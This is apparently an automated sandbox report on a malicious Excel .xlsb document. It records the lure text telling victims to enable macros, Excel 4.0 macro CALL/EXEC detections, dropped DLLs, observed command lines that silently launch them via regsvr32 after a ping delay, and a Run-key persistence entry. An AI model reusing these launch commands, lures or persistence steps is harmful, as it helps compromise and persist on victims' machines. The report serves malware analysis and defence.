    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://settings.outlook.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://tasks.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownHTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 12Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 12Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 16Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. PROTECTED VIEW This f
    Source: Screenshot number: 16Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of document. E
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Documents_13134976_1377491379.xlsbInitial sample: CALL
    Source: Documents_13134976_1377491379.xlsbInitial sample: EXEC
    Source: Documents_13134976_1377491379.xlsbInitial sample: CALL
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A6DAE
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B2254
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B8E18
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696AF1F0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B3508
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A1788
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A204C
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A1284
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69646DAE
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69652254
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69658E18
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964F1F0
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69653508
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69641788
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964204C
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69641284
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00458282
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_004602A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045FC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00454554
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00460CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00455372
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00455EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00459F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00453B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00451517
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00458D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00457F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00458598
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00456118
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00452B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_004626AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00456537
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A202A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A12B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A16537
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A14554
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A226AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A13B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A18282
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A19F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A18D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A17F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A11517
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A18598
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A16118
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A20CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A15372
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A15EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1FC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B76537
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B802A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B74554
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B72B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B826AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B71517
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B77F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B78D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B78598
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B76118
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B79F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B78282
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B73B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B75372
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B75EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B80CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7FC4D
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\L3YD7CE.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\iepfusn.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@28/13@1/4
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D4554 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Process32Next,
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\NFIRRWAVEQLJNKX7G17J1Q
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{4F0D64AE-B9BF-48DC-A1ED-DB4CEC735B81} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe -s ..\iepfusn.dll
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe -s ..\iepfusn.dll
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Local\Temp\L3YD7CE.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file

    Boot Survival:

    barindex
    Creates an autostart registry key pointing to binary in C:\WindowsShow sources
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
